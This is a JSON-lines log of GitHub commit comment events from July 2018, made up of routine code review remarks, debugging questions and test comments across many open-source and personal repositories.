{"id":"7909476872","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573538,"position":57,"line":57,"path":"src/utils/ShapeInformation.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:45:14Z","updated_at":"2018-07-02T23:45:14Z","author_association":"NONE","body":"`universe` can be null in signature. This cannot type check."}},"created_at":"2018-07-02T23:45:14Z"}
{"id":"7909477008","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29573539,"position":null,"line":null,"path":null,"commit_id":"0da4c17169368ebd2bb8723d8fdcfd7be7a261aa","created_at":"2018-07-02T23:45:17Z","updated_at":"2018-07-02T23:45:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use new logging framework, save to file locally](https://trello.com/c/wePBnhFF/27-use-new-logging-framework-save-to-file-locally)"}},"created_at":"2018-07-02T23:45:17Z"}
{"id":"7909478305","type":"CommitCommentEvent","actor":{"login":"menghanl"},"repo":{"name":"grpc/grpc-go"},"payload":{"comment":{"id":29573544,"position":12,"line":62,"path":"balancer/grpclb/grpclb.go","commit_id":"536e74e045bc4dbf4445506674d1573a6aa9dd56","created_at":"2018-07-02T23:45:48Z","updated_at":"2018-07-02T23:45:48Z","author_association":"CONTRIBUTOR","body":"Thanks for pointing this out.\r\nIMO this is not a big issue, and it only runs once at the init time of the program.\r\n\r\nIf you are still concerned about this, a PR would be appreciated. Thanks!"}},"created_at":"2018-07-02T23:45:48Z"}
{"id":"7909481166","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573551,"position":63,"line":63,"path":"src/utils/ShapeInformation.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:46:56Z","updated_at":"2018-07-02T23:46:56Z","author_association":"NONE","body":"Is that `unknownShape` technically needed for something?\r\nIf not, do you feel strongly that this is better than an `undefined` shape? Why?"}},"created_at":"2018-07-02T23:46:56Z"}
{"id":"7909481631","type":"CommitCommentEvent","actor":{"login":"PUMXLVITES"},"repo":{"name":"PUMXLVITES/miprimerrepositorio"},"payload":{"comment":{"id":29573554,"position":null,"line":null,"path":null,"commit_id":"5326e0424389169ec3ad884a460d0c475d39aa9c","created_at":"2018-07-02T23:47:07Z","updated_at":"2018-07-02T23:47:07Z","author_association":"OWNER","body":"cccc"}},"created_at":"2018-07-02T23:47:07Z"}
{"id":"7909483033","type":"CommitCommentEvent","actor":{"login":"vloxflox"},"repo":{"name":"vloxflox/petFera"},"payload":{"comment":{"id":29573555,"position":null,"line":null,"path":null,"commit_id":"d7dc3734c95f5cfcf670359096c706721784064f","created_at":"2018-07-02T23:47:41Z","updated_at":"2018-07-02T23:47:41Z","author_association":"OWNER","body":"Não é extração, é inserção."}},"created_at":"2018-07-02T23:47:41Z"}
{"id":"7909486998","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573559,"position":39,"line":889,"path":"src/values/AbstractValue.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:49:14Z","updated_at":"2018-07-02T23:49:14Z","author_association":"NONE","body":"Avoid `?ShapeInformation`, use `shape?` or `void | ShapeInformation`."}},"created_at":"2018-07-02T23:49:14Z"}
{"id":"7909487186","type":"CommitCommentEvent","actor":{"login":"madhurichowdari"},"repo":{"name":"madhurichowdari/lms"},"payload":{"comment":{"id":29573560,"position":null,"line":null,"path":null,"commit_id":"f155a90cf566ea591a409702a566d3dac6f8c545","created_at":"2018-07-02T23:49:18Z","updated_at":"2018-07-02T23:49:18Z","author_association":"OWNER","body":"This is the error resulting while debugging:\r\nSystem.Data.SqlClient.SqlException: 'A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL server."}},"created_at":"2018-07-02T23:49:18Z"}
{"id":"7909487734","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29573561,"position":null,"line":null,"path":null,"commit_id":"c099a9399b6ff09cc9568ee089db9f3c532a8e6f","created_at":"2018-07-02T23:49:30Z","updated_at":"2018-07-02T23:49:30Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-tandem4](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-tandem4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-tandem4-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T23:49:30Z"}
{"id":"7909488790","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573564,"position":47,"line":154,"path":"src/serializer/functions.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:49:51Z","updated_at":"2018-07-02T23:49:51Z","author_association":"NONE","body":"Generally, prefer `argModelString !== undefined` over `argModelString` for more precise truthiness checks."}},"created_at":"2018-07-02T23:49:51Z"}
{"id":"7909492073","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573569,"position":16,"line":16,"path":"src/utils/ShapeInformation.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:51:02Z","updated_at":"2018-07-02T23:51:02Z","author_association":"NONE","body":"\"Description\" sounds like something for human consumption. Rename all that to \"Descriptor\"."}},"created_at":"2018-07-02T23:51:02Z"}
{"id":"7909493168","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29573574,"position":null,"line":null,"path":null,"commit_id":"678ef86ff238f3e0336164a55a3fcfac2b6bbe3c","created_at":"2018-07-02T23:51:27Z","updated_at":"2018-07-02T23:51:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-593](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-593).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-593-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T23:51:27Z"}
{"id":"7909494091","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573576,"position":null,"line":null,"path":null,"commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:51:49Z","updated_at":"2018-07-02T23:51:49Z","author_association":"NONE","body":"Don't hesitate to make all this into a PR on the Prepack repro.\r\nFor now, mark it in the title as [WIP], and I think we also have a tag for that."}},"created_at":"2018-07-02T23:51:49Z"}
{"id":"7909495023","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29573581,"position":20,"line":198,"path":"flink-contrib/flink-statebackend-rocksdb/src/main/java/org/apache/flink/contrib/streaming/state/RocksDBStateBackend.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-02T23:52:12Z","updated_at":"2018-07-02T23:52:12Z","author_association":"OWNER","body":"Makes sense, will add that change here."}},"created_at":"2018-07-02T23:52:12Z"}
{"id":"7909498921","type":"CommitCommentEvent","actor":{"login":"riiohoih"},"repo":{"name":"riiohoih/proj"},"payload":{"comment":{"id":29573595,"position":null,"line":null,"path":null,"commit_id":"11b2cea78c4809c1708ee4c6151a3f5fa9dbea48","created_at":"2018-07-02T23:53:45Z","updated_at":"2018-07-02T23:53:45Z","author_association":"OWNER","body":"asdas"}},"created_at":"2018-07-02T23:53:45Z"}
{"id":"7909499028","type":"CommitCommentEvent","actor":{"login":"riiohoih"},"repo":{"name":"riiohoih/proj"},"payload":{"comment":{"id":29573599,"position":null,"line":null,"path":null,"commit_id":"11b2cea78c4809c1708ee4c6151a3f5fa9dbea48","created_at":"2018-07-02T23:53:48Z","updated_at":"2018-07-02T23:53:48Z","author_association":"OWNER","body":"xgdfgfd"}},"created_at":"2018-07-02T23:53:48Z"}
{"id":"7909499296","type":"CommitCommentEvent","actor":{"login":"lawando"},"repo":{"name":"lawando/OpenRAUserAccounts"},"payload":{"comment":{"id":29573600,"position":null,"line":null,"path":null,"commit_id":"8727ec512e3a55d7420447bc6bf42d8d22f2451b","created_at":"2018-07-02T23:53:56Z","updated_at":"2018-07-02T23:53:56Z","author_association":"OWNER","body":"Something is wrong with my indentation settings. Bad commit."}},"created_at":"2018-07-02T23:53:56Z"}
{"id":"7909503370","type":"CommitCommentEvent","actor":{"login":"Olly1005"},"repo":{"name":"Automattic/amp-wp"},"payload":{"comment":{"id":29573612,"position":null,"line":null,"path":null,"commit_id":"79d2d13e2ce9aa3599e443b9e441463a62f6be02","created_at":"2018-07-02T23:55:33Z","updated_at":"2018-07-02T23:55:33Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-02T23:55:33Z"}
{"id":"7909514915","type":"CommitCommentEvent","actor":{"login":"oberon-manjaro"},"repo":{"name":"Chrysostomus/manjaro-architect"},"payload":{"comment":{"id":29573632,"position":null,"line":null,"path":null,"commit_id":"3117d31410ffa16a0ef169f6e97cb3547f2bf3ca","created_at":"2018-07-02T23:59:53Z","updated_at":"2018-07-02T23:59:53Z","author_association":"COLLABORATOR","body":"This also needs to be changed in **lib/util-base.sh** !"}},"created_at":"2018-07-02T23:59:53Z"}
{"id":"7909515007","type":"CommitCommentEvent","actor":{"login":"ChrisJAllan"},"repo":{"name":"jobisoft/TbSync"},"payload":{"comment":{"id":29573633,"position":null,"line":null,"path":null,"commit_id":"eaf05fae0202d616cd0efe35120de9f94b2c0f7f","created_at":"2018-07-02T23:59:55Z","updated_at":"2018-07-02T23:59:55Z","author_association":"CONTRIBUTOR","body":"Alright"}},"created_at":"2018-07-02T23:59:55Z"}
{"id":"7904231677","type":"CommitCommentEvent","actor":{"login":"zwmeimeimei"},"repo":{"name":"zwmeimeimei/hello_world"},"payload":{"comment":{"id":29560655,"position":null,"line":null,"path":null,"commit_id":"5ace6c7bdfbc77886bb37960c86857a800aa202e","created_at":"2018-07-02T03:00:05Z","updated_at":"2018-07-02T03:00:05Z","author_association":"OWNER","body":"init"}},"created_at":"2018-07-02T03:00:05Z"}
{"id":"7904232832","type":"CommitCommentEvent","actor":{"login":"isuruf"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":29560661,"position":null,"line":null,"path":null,"commit_id":"458f120a72b60313765b507b903b700e490a40f4","created_at":"2018-07-02T03:00:26Z","updated_at":"2018-07-02T03:00:26Z","author_association":"MEMBER","body":"Where did this commit come from?"}},"created_at":"2018-07-02T03:00:26Z"}
{"id":"7904239614","type":"CommitCommentEvent","actor":{"login":"sharmakartik93"},"repo":{"name":"sultanxda/android_kernel_google_wahoo"},"payload":{"comment":{"id":29560679,"position":null,"line":null,"path":null,"commit_id":"2e7bb0f548c23ec47ad6ea5640e2179a8e9246da","created_at":"2018-07-02T03:03:00Z","updated_at":"2018-07-02T03:03:00Z","author_association":"NONE","body":"@franciscofranco can you explain what's related to WeChat?"}},"created_at":"2018-07-02T03:03:00Z"}
{"id":"7904241009","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29560681,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T03:03:33Z","updated_at":"2018-07-02T03:03:33Z","author_association":"CONTRIBUTOR","body":"\"no end of trouble\" is most likely constraint recursion. The \"not-same-as\" constraint is there to avoid evaluating the other constraints that will most certainly recurse. "}},"created_at":"2018-07-02T03:03:33Z"}
{"id":"7904242860","type":"CommitCommentEvent","actor":{"login":"sharmakartik93"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29560689,"position":null,"line":null,"path":null,"commit_id":"ae663494a4062b662ccd7d8a7502fedc2e50b431","created_at":"2018-07-02T03:04:17Z","updated_at":"2018-07-02T03:04:17Z","author_association":"NONE","body":"@RenderBroken new build hype. :heart_eyes:"}},"created_at":"2018-07-02T03:04:17Z"}
{"id":"7904244514","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29560693,"position":null,"line":null,"path":null,"commit_id":"ae663494a4062b662ccd7d8a7502fedc2e50b431","created_at":"2018-07-02T03:05:01Z","updated_at":"2018-07-02T03:05:01Z","author_association":"OWNER","body":"@renderbroken, no not yet. I haven't done measurements for screen on wake with this change "}},"created_at":"2018-07-02T03:05:01Z"}
{"id":"7904245986","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29560694,"position":11,"line":84,"path":"src/openssl/ssl/context.cr","commit_id":"080d476240bf6afe9c15fe66145a30312322506d","created_at":"2018-07-02T03:05:41Z","updated_at":"2018-07-02T03:05:41Z","author_association":"CONTRIBUTOR","body":"You can set it directly in the ivar declaration:\r\n\r\n```cr\r\n@hostname : String = \"\"\r\n```"}},"created_at":"2018-07-02T03:05:41Z"}
{"id":"7904247601","type":"CommitCommentEvent","actor":{"login":"franciscofranco"},"repo":{"name":"sultanxda/android_kernel_google_wahoo"},"payload":{"comment":{"id":29560696,"position":null,"line":null,"path":null,"commit_id":"2e7bb0f548c23ec47ad6ea5640e2179a8e9246da","created_at":"2018-07-02T03:06:24Z","updated_at":"2018-07-02T03:06:24Z","author_association":"NONE","body":"It's written in the commit message."}},"created_at":"2018-07-02T03:06:24Z"}
{"id":"7904249670","type":"CommitCommentEvent","actor":{"login":"Werther-cool"},"repo":{"name":"Werther-cool/note"},"payload":{"comment":{"id":29560701,"position":null,"line":null,"path":null,"commit_id":"ff0cdbb499bcf817956c9ee148d519f8f7649e7c","created_at":"2018-07-02T03:07:17Z","updated_at":"2018-07-02T03:07:17Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-02T03:07:17Z"}
{"id":"7904253006","type":"CommitCommentEvent","actor":{"login":"Gulidon"},"repo":{"name":"Gulidon/Python-OOP"},"payload":{"comment":{"id":29560704,"position":42,"line":40,"path":"README.md","commit_id":"b5d77d76a7eaddd7635e7f1b3ab228f30221abca","created_at":"2018-07-02T03:08:47Z","updated_at":"2018-07-02T03:08:47Z","author_association":"OWNER","body":"01.PY\r\n#定义一个学生类\r\nclass Student():\r\n    #用pass可以占位\r\n    pass\r\n\r\n#定义一个对象\r\n#liming = Student()\r\n\r\n#定义一个学Python的学生\r\nclass PythonStudent():\r\n    # 用none给不确定的值赋值\r\n    name = None\r\n    age = 18\r\n    curse = \"Python\"\r\n\r\n\r\n\r\n    def dohomework(self):\r\n        print(\"做作业\")\r\n\r\n\r\n\r\nlihua = PythonStudent()\r\n\r\nprint(\"lihua今年\",lihua.age,\"岁了\")\r\nprint(\"他学的课程是\",lihua.curse)\r\nprint(lihua.dohomework())\r\n"}},"created_at":"2018-07-02T03:08:47Z"}
{"id":"7904253837","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29560708,"position":168,"line":2351,"path":"packet_service/types.lua","commit_id":"26cea501f60cec498eb2487fb1a046b7a198792d","created_at":"2018-07-02T03:09:12Z","updated_at":"2018-07-02T03:09:12Z","author_association":"MEMBER","body":"Cause byte alignment"}},"created_at":"2018-07-02T03:09:12Z"}
{"id":"7904254701","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"pypa/pipenv"},"payload":{"comment":{"id":29560710,"position":null,"line":null,"path":null,"commit_id":"6e8586032a06b6c12a7476bce3539fa486fb16e9","created_at":"2018-07-02T03:09:35Z","updated_at":"2018-07-02T03:09:35Z","author_association":"NONE","body":"..3"}},"created_at":"2018-07-02T03:09:35Z"}
{"id":"7904257149","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"pypa/pipenv"},"payload":{"comment":{"id":29560714,"position":26,"line":2082,"path":"pipenv/core.py","commit_id":"a36239ff6888fe7d33342363c63075a7b409861b","created_at":"2018-07-02T03:10:33Z","updated_at":"2018-07-02T03:10:33Z","author_association":"NONE","body":":3"}},"created_at":"2018-07-02T03:10:33Z"}
{"id":"7904262916","type":"CommitCommentEvent","actor":{"login":"binhle410"},"repo":{"name":"magenta-wellness/smart-warranty-dev"},"payload":{"comment":{"id":29560728,"position":4,"line":10,"path":"libraries/spa/ngx-reg/.gitignore","commit_id":"5fe69f20986697c586a4d3845c81f05e456c5148","created_at":"2018-07-02T03:12:48Z","updated_at":"2018-07-02T03:12:48Z","author_association":"COLLABORATOR","body":"@minhnguyenwp  Cho nay ne"}},"created_at":"2018-07-02T03:12:48Z"}
{"id":"7904273910","type":"CommitCommentEvent","actor":{"login":"platinum4"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29560741,"position":null,"line":null,"path":null,"commit_id":"39899fe1ebd84a83efd8812c4664af28dcf5f3c3","created_at":"2018-07-02T03:17:42Z","updated_at":"2018-07-02T03:17:42Z","author_association":"CONTRIBUTOR","body":"Do you see anything wrong with mine?\r\n\r\n`        do {\r\n            # Read Data from hardware\r\n            $ComputeData = [PSCustomObject]@{}\r\n            $ComputeData = (Get-ComputeData -MinerType $this.Type -Index $this.Index)\r\n            $PowerDraws += $ComputeData.PowerDraw\r\n            $ComputeUsages += $ComputeData.ComputeUsage\r\n\r\n            $HashRates += $HashRate = [PSCustomObject]@{}\r\n\r\n            try {\r\n                $Response = Invoke-TcpRequest $Server $this.Port $Request $Timeout -ErrorAction Stop\r\n                $Data = $Response -split \";\" | ConvertFrom-StringData -ErrorAction Stop\r\n            }\r\n            catch {}\r\n                \r\n            $HashRate_Name = [String]$Data.algo\r\n            if (-not $HashRate_Name) {$HashRate_Name = [String]($Algorithm -like \"$(Get-Algorithm $Data.algo)*\")} #temp fix\r\n            $HashRate_Value = if ([Double]$Data.KHS -ne 0 -or [Double]$Data.ACC -ne 0) {$Data.KHS * 1000}\r\n\r\n            if ($HashRate_Name -and ($Algorithm -like (Get-Algorithm $HashRate_Name)).Count -eq 1) {\r\n                $HashRate | Add-Member @{(Get-Algorithm $HashRate_Name) = [Int64]$HashRate_Value}\r\n            }\r\n\r\n            $Algorithm | Where-Object {-not $HashRate.$_} | ForEach-Object {break}\r\n\r\n            if (-not $Safe) {break}\r\n\r\n            Start-Sleep $Interval\r\n        } while ($HashRates.Count -lt 6)`\r\n\r\nIt won't gather hashrates but it will gather power draw and compute usage; works for every other ccminer and the code you put for cryptodredge api looks the exact same as the ccminer include"}},"created_at":"2018-07-02T03:17:42Z"}
{"id":"7904282439","type":"CommitCommentEvent","actor":{"login":"kejiewang"},"repo":{"name":"kejiewang/I-want-find-job"},"payload":{"comment":{"id":29560748,"position":null,"line":null,"path":null,"commit_id":"1cb0b965a9db4171c9b0acdaf996e6e97e51ab34","created_at":"2018-07-02T03:21:37Z","updated_at":"2018-07-02T03:21:37Z","author_association":"OWNER","body":"add 哈哈"}},"created_at":"2018-07-02T03:21:37Z"}
{"id":"7904298584","type":"CommitCommentEvent","actor":{"login":"billpage"},"repo":{"name":"billpage/ncpoly"},"payload":{"comment":{"id":29560766,"position":null,"line":null,"path":null,"commit_id":"0e3ebdb6928d4217a67f7a0a391efcefbf5e0dd0","created_at":"2018-07-02T03:28:51Z","updated_at":"2018-07-02T03:28:51Z","author_association":"OWNER","body":"On Sat, Jun 23, 2018 at 2:09 PM, Raymond Rogers <raymond.rogers72@gmail.com> wrote:\r\n> ...\r\n> 2) Attached is a tar collection that I think implements a test fixture for running NCP test sequences.\r\n> 3)nc_ini03-a.input is a hashed up collection of what I think is needed.\r\n>    I will take out the commented sections if you agree.\r\n> 4) I  would like you to look at the README to see if it makes sense.  I do know, you probably don't need it.\r\n> 5) I will start adding tests and cleaning things up if there are no corrections and everybody agrees (fat chance :-) ).\r\n> 6) Missing is an output that collects pass/fail in a nice format. Examples/suggestions please.\r\n> \r\n> Of course I welcome anybody who wants to try it.\r\n"}},"created_at":"2018-07-02T03:28:51Z"}
{"id":"7904300251","type":"CommitCommentEvent","actor":{"login":"sairohit143"},"repo":{"name":"sairohit143/spring-boot"},"payload":{"comment":{"id":29560769,"position":null,"line":null,"path":null,"commit_id":"70a0c8fbb09867dbf3bc6d0ee1914989db5d4798","created_at":"2018-07-02T03:29:35Z","updated_at":"2018-07-02T03:29:35Z","author_association":"OWNER","body":"they are spring boot libraries,they are constant we can't change "}},"created_at":"2018-07-02T03:29:35Z"}
{"id":"7904302884","type":"CommitCommentEvent","actor":{"login":"uki213"},"repo":{"name":"uki213/vue_todo_test"},"payload":{"comment":{"id":29560775,"position":null,"line":null,"path":null,"commit_id":"cda453a2e9b568f7f126d31484067d6d4fb60dd4","created_at":"2018-07-02T03:30:46Z","updated_at":"2018-07-02T03:30:46Z","author_association":"OWNER","body":"やっぱりこれだと'sendTask'に'Object.assign'で逃しているにもかかわらず、'sendTask.taskId = Date.now();'で入れたものが、'this.task.taskId'に入ってしまっている…。\r\nなんでだ？？？"}},"created_at":"2018-07-02T03:30:46Z"}
{"id":"7904303865","type":"CommitCommentEvent","actor":{"login":"WangChangzhang"},"repo":{"name":"WangChangzhang/cloudconfig"},"payload":{"comment":{"id":29560776,"position":null,"line":null,"path":null,"commit_id":"7d62f5fe5b57a1747f2de6d87a46319ef870055c","created_at":"2018-07-02T03:31:12Z","updated_at":"2018-07-02T03:31:12Z","author_association":"OWNER","body":"2018-7-2"}},"created_at":"2018-07-02T03:31:12Z"}
{"id":"7904305562","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"kingmoduk/Felix"},"payload":{"comment":{"id":29560777,"position":null,"line":null,"path":null,"commit_id":"6fc380782c77c419c36858df3cfdb9da46579ee9","created_at":"2018-07-02T03:31:59Z","updated_at":"2018-07-02T03:31:59Z","author_association":"OWNER","body":"Wikipedia..\r\n"}},"created_at":"2018-07-02T03:31:59Z"}
{"id":"7904305885","type":"CommitCommentEvent","actor":{"login":"ufrshubham"},"repo":{"name":"ufrshubham/SDBMS"},"payload":{"comment":{"id":29560778,"position":17,"line":17,"path":"SDBMS/ReadWrite.h","commit_id":"5d0b9abac0cd09848019349022086286d21c1972","created_at":"2018-07-02T03:32:08Z","updated_at":"2018-07-02T03:32:08Z","author_association":"OWNER","body":"Oh, now I got the point. If they are both two different things it makes sense to store them. 👍"}},"created_at":"2018-07-02T03:32:08Z"}
{"id":"7904307369","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"kingmoduk/Felix"},"payload":{"comment":{"id":29560782,"position":1,"line":1,"path":".gitignore","commit_id":"6fc380782c77c419c36858df3cfdb9da46579ee9","created_at":"2018-07-02T03:32:47Z","updated_at":"2018-07-02T03:32:47Z","author_association":"OWNER","body":"Hello\r\n"}},"created_at":"2018-07-02T03:32:47Z"}
{"id":"7904308106","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"kingmoduk/Felix"},"payload":{"comment":{"id":29560784,"position":2,"line":2,"path":".gitignore","commit_id":"6fc380782c77c419c36858df3cfdb9da46579ee9","created_at":"2018-07-02T03:33:05Z","updated_at":"2018-07-02T03:33:05Z","author_association":"OWNER","body":"Index"}},"created_at":"2018-07-02T03:33:05Z"}
{"id":"7904310150","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29560786,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-02T03:34:04Z","updated_at":"2018-07-02T03:34:04Z","author_association":"NONE","body":"copied ffmpeg include files to folder you specified, to see if that fixes the problem\r\n"}},"created_at":"2018-07-02T03:34:04Z"}
{"id":"7904317272","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"erinxocon/spotify-local"},"payload":{"comment":{"id":29560801,"position":48,"line":34,"path":"tests/test_spotify_local.py","commit_id":"399d1f13c03e4bbbd68856bdfe058ef8f4fcd2eb","created_at":"2018-07-02T03:37:14Z","updated_at":"2018-07-02T03:37:14Z","author_association":"NONE","body":"What time do you want to meet"}},"created_at":"2018-07-02T03:37:14Z"}
{"id":"7904319222","type":"CommitCommentEvent","actor":{"login":"MichaelRWolf"},"repo":{"name":"MichaelRWolf/GEM_Mobile_App"},"payload":{"comment":{"id":29560807,"position":null,"line":null,"path":null,"commit_id":"7d71c3adf6d996269f0498722fc6fffec1b41110","created_at":"2018-07-02T03:38:01Z","updated_at":"2018-07-02T03:38:01Z","author_association":"OWNER","body":"I like the PDF file.  Is the SQL file coming soon to a feature branch or to 'master'?"}},"created_at":"2018-07-02T03:38:01Z"}
{"id":"7904327284","type":"CommitCommentEvent","actor":{"login":"billpage"},"repo":{"name":"billpage/ncpoly"},"payload":{"comment":{"id":29560833,"position":null,"line":null,"path":null,"commit_id":"e2013cdcb547a5dce394aa910837a4a2d2e305a1","created_at":"2018-07-02T03:41:49Z","updated_at":"2018-07-02T03:41:49Z","author_association":"OWNER","body":"On Mon, Jun 4, 2018 at 2:10 PM, Konrad Schrempf <schrempf@math.tugraz.at> wrote:\r\n> Bill Page wrote:\r\n> > One thing that I did notice is that the equality Boolean function is\r\n> > currently missing from \"ncpoly.spad\". Perhaps something like\r\n> >\r\n> >    (f:% = g:%) : Boolean == polynomial(f) = polynomial(g)\r\n> >\r\n> > would be suitable, or maybe something more efficient based more\r\n> > directly on functions from \"linpen.spad\"?\r\n> This is the word problem http://arxiv.org/pdf/1701.03378\r\n> It's only a few lines. The systems have to be minimal.\r\n> But that's easy. What you suggest would work but should not\r\n> be done because that's about equality in terms of formal\r\n> power series. I should have the code somewhere. But if you\r\n> would like to try yourself, I can look over it later:\r\n> f - g = 0 ?"}},"created_at":"2018-07-02T03:41:49Z"}
{"id":"7904327999","type":"CommitCommentEvent","actor":{"login":"feizai123"},"repo":{"name":"feizai123/git"},"payload":{"comment":{"id":29560834,"position":null,"line":null,"path":null,"commit_id":"4972a8e71a5f66a6e19c7420e88fa925cd0858a8","created_at":"2018-07-02T03:42:10Z","updated_at":"2018-07-02T03:42:10Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-02T03:42:10Z"}
{"id":"7904329142","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560837,"position":18,"line":39,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T03:42:40Z","updated_at":"2018-07-02T03:42:40Z","author_association":"OWNER","body":"Что-то я не могу найти использование ни в предыдущей версии, ни в новой версии."}},"created_at":"2018-07-02T03:42:40Z"}
{"id":"7904334483","type":"CommitCommentEvent","actor":{"login":"rstormsf"},"repo":{"name":"rstormsf/multisender"},"payload":{"comment":{"id":29560850,"position":null,"line":null,"path":null,"commit_id":"7f371b15cac37d3da87fe07568be39353c539463","created_at":"2018-07-02T03:45:11Z","updated_at":"2018-07-02T03:45:11Z","author_association":"OWNER","body":"just use the Dapp - it can handle 5000 addresses"}},"created_at":"2018-07-02T03:45:11Z"}
{"id":"7904336404","type":"CommitCommentEvent","actor":{"login":"emirhankenter"},"repo":{"name":"emirhankenter/ActorPopularity"},"payload":{"comment":{"id":29560853,"position":null,"line":null,"path":null,"commit_id":"a1c5679f22656d3d8f9f927018ac9a44723a28d7","created_at":"2018-07-02T03:46:02Z","updated_at":"2018-07-02T03:46:02Z","author_association":"OWNER","body":"Brat Pitt's image is default when actorObj[\"profile_path\"] is nil"}},"created_at":"2018-07-02T03:46:02Z"}
{"id":"7904339972","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29560858,"position":9,"line":32,"path":"db/seeds.rb","commit_id":"51f8402b60d547fe02c03b20d68124ae14624352","created_at":"2018-07-02T03:47:39Z","updated_at":"2018-07-02T03:47:39Z","author_association":"NONE","body":"Trong model `Post` đã validate cái `to_post` phải lớn hơn hiện tại, nên trong seed em phải để thời gian ở tương lai, nếu ko người khác chạy seeds lần đầu sẽ bị lỗi.\r\nCó thể dùng `1.day.from_now` hoặc tương tự thế để lấy thời gian tương lai."}},"created_at":"2018-07-02T03:47:39Z"}
{"id":"7904341568","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29560860,"position":22,"line":43,"path":"db/seeds.rb","commit_id":"51f8402b60d547fe02c03b20d68124ae14624352","created_at":"2018-07-02T03:48:20Z","updated_at":"2018-07-02T03:48:20Z","author_association":"NONE","body":"Tương tự `to_post` ở trên"}},"created_at":"2018-07-02T03:48:20Z"}
{"id":"7904341720","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29560862,"position":35,"line":54,"path":"db/seeds.rb","commit_id":"51f8402b60d547fe02c03b20d68124ae14624352","created_at":"2018-07-02T03:48:24Z","updated_at":"2018-07-02T03:48:24Z","author_association":"NONE","body":"Tương tự `to_post` ở trên"}},"created_at":"2018-07-02T03:48:24Z"}
